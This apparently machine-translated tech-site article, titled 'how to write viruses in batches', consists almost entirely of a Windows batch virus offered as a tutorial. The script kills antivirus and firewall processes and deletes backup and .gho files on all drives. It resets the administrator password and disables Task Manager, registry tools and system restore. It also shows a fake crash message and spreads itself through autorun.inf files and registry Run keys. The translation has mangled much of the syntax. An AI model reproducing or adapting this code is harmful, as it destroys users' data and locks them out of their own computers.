In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/03 Report--
This article introduces the knowledge of "how to write viruses in batches". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!
The code is as follows:
@ echo off
Title You DEAD!
Set taskkill=s
Copy 0 windir%\ system32\ cmd.bat
Attrib% windir%\ system32\ cmd.bat + r + s + h
Net stop sharedaccess > nul
S / im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE / f > nul
S / im norton* / f > nul
S / im av* / f > nul
S / im fire* / f > nul
S / im anti* / f > nul
S / im spy* / f > nul
S / im bullguard / f > nul
S / im PersFw / f > nul
S / im KAV* / f > nul
S / im ZONEALARM / f > nul
S / im SAFEWEB / f > nul
S / im OUTPOST / f > nul
S / im nv* / f > nul
S / im nav* / f > nul
% s% / im Fmuri * / f > nul
S / im ESAFE / f > nul
S / im cle / f > nul
S / im BLACKICE / f > nul
S / im def* / f > nul
S / im 360safe.exe / f > nul
Net stop Shadow "" System "" Service
Set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
For% an in (c% alldrive%) do del% a:\ 360 * / f / s / Q > nul
For% an in (c% alldrive%) do del% a:\ repair * / f / s / Q > nul
Rem modifies the registry.
REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ explorer\ Advanced\
Folder\ Hidden\ SHOWALL / v
CheckedValue / t REG_DWORD / d 00000000 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoRun / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoRecentDocsMenu / t
REG_DWORD / d 00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoDrives / t REG_DWORD / d
4294967295 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System / v
Disableregistrytools / t
REG_DWORD / d 00000002 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoNetHood / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / V
NoDesktop / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoClose / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoFind / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System / v
DisableTaskMgr / t REG_DWORD
/ d 00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoLogOff / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
NoSetTaskBar / t REG_DWORD
/ d 00000001 / f > nul
REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows "" NT\ CurrentVersion\ SystemRestore / v
DisableSR / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_LOCAL_MACHINE\ SOFTWARE\ Policies\ Microsoft\ Windows "" NT\ SystemRestore / v
DisableConfig / t REG_DWORD / d
00000001 / f > nul
REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v
RestrictRun / t REG_DWORD / d
00000001 / f > nul
Cls
Net user administrator 123456 > nul
For% c in (c% alldrive%) do del% c:\ * .gho / f / s / Q > nul
Echo @ echo off > d:\ setup.bat
Echo shutdown-r-t 10-f-c Dear friends, I am very sorry to inform you that your computer has seriously crashed, please re-
Installing the system can solve this problem.
! ^. ^ > d:\ setup.bat
Echo copy d:\ setup.bat c:\ Documents "and"Settings\ All"Users\" start menu\ Program\ start
\ a.bat > > d:\ setup.bat
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > d:\ setup.bat
Echo REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > d:\ setup.bat
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > d:\ setup.bat
HKEY_CLASSES_ROOT\ batfile\ shell\ open\ command / v setup.bat / t REG_SZ / d:\ setup.bat / f
> > d:\ setup.bat
Echo [windows] > >% windir%\ win.ini
Echo run=d:\ setup.bat C:\ AUTOEXEC.BAT > >% windir%\ win.ini
Echo load=d:\ setup.bat C:\ AUTOEXEC.BAT > >% windir%\ win.ini
Echo [boot] > >% windir%\ system.ini
Echo shell=explorer.exe setup.bat C:\ AUTOEXEC.BAT > >% windir%\ system.ini
Echo [AutoRun] > d:\ autorun.inf
Echo Open=setup.bat > > d:\ autorun.inf
Echo Open=system.bat > > d:\ autorun.inf
Attrib d:\ autorun.inf + r + s + h > > d:\ setup.bat
Attrib d:\ setup.bat + r + s + h > > d:\ setup.bat
Start d:\ setup.bat / min > nul
Echo @ echo off > > C:\ AUTOEXEC.BAT
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
AUTOEXEC.BAT / t REG_SZ / d
C:\ AUTOEXEC.BAT / f > > C:\ AUTOEXEC.BAT
Echo REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
AUTOEXEC.BAT / t REG_SZ / d
C:\ AUTOEXEC.BAT / f > > C:\ AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce / v
AUTOEXEC.BAT / t REG_SZ / d
C:\ AUTOEXEC.BAT / f > > C:\ AUTOEXEC.BAT
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > C:\ AUTOEXEC.BAT
Echo REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > C:\ AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > C:\ AUTOEXEC.BAT
Echo if not d:\ setup.bat start% windir%\ system32\ cmd.bat / min > > C:\ AUTOEXEC.BAT
Copy 0 systemroot%\ windows.bat > nul
If not exist windir%/system32/explorer.bat @ echo off > > windir%/system32/explorer.bat
If not exist C:\ AUTOEXEC.BAT start% windir%\ system32\ cmd.bat / min > >%
Windir%/system32/explorer.bat
If not exist% windir%\ system32\ cmd.bat start% systemroot%\ windows.bat / min > >%
Windir%/system32/explorer.bat
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
AUTOEXEC.BAT / t REG_SZ / d
C:\ AUTOEXEC.BAT / f > >% windir%/system32/explorer.bat
Echo REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
AUTOEXEC.BAT / t REG_SZ / d
C:\ AUTOEXEC.BAT / f > >% windir%/system32/explorer.bat
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > windir%/system32/explorer.bat
Echo REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Setup.bat / t REG_SZ / d d:\ setup.bat
/ f > > windir%/system32/explorer.bat
Echo REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Explorer.bat / t REG_SZ / d%
Windir%/system32/explorer.bat/f > > windir%/system32/explorer.bat
Echo REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v
Explorer.bat / t REG_SZ / d%
Windir%/system32/explorer.bat / f > > windir%/system32/explorer.bat
Echo start systemroot%\ windows.bat / min > > windir%/system32/explorer.bat
Attrib% windir%/system32/explorer.bat + r + s + h%
Attrib% systemroot%/windows.bat + r + s + h
For% c in (% alldrive%) do echo @ echo off > >% c:\ system.bat
For% c in (% alldrive%) do echo start% windir%\ system32\ cmd.bat / min >% c:\ system.bat
For% c in (% alldrive%) do echo attrib system.bat + r + s + h >% c:\ system.bat
Set drive=e f g h i j k l m n o p q r s t u v w x y z
For% c in (% drive%) do echo [AuroRun] >% c:\ autorun.inf
For% c in (% drive%) do echo Open=system.bat > >% c:\ autorun.inf
Copy 0 d:\ Program "" Files\ run.bat "
For c in (alldrive%) do echo if not exist windir%/system32/explorer.bat start
D:\ Program "" Files\ run.bat / min
> >% c:\ system.bat
For% c in (% alldrive%) do attrib autorun.inf + r + s + h >% c:\ system.bat
For% c in (% alldrive%) do attrib% c:\ autorun.inf + r + s + h > nul
For% c in (% alldrive%) do attrib% c:\ system.bat + r + s + h > nul
If not exist% windir%/system32/explorer.bat start d:\ Program "" Files\ run.bat "
/ min > > d:\ setup.bat
Attrib d:\ Program "" Files\ run.bat + r + s + h > nul
Del 0
Exit
This is the end of the content of "how to write viruses in batches". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
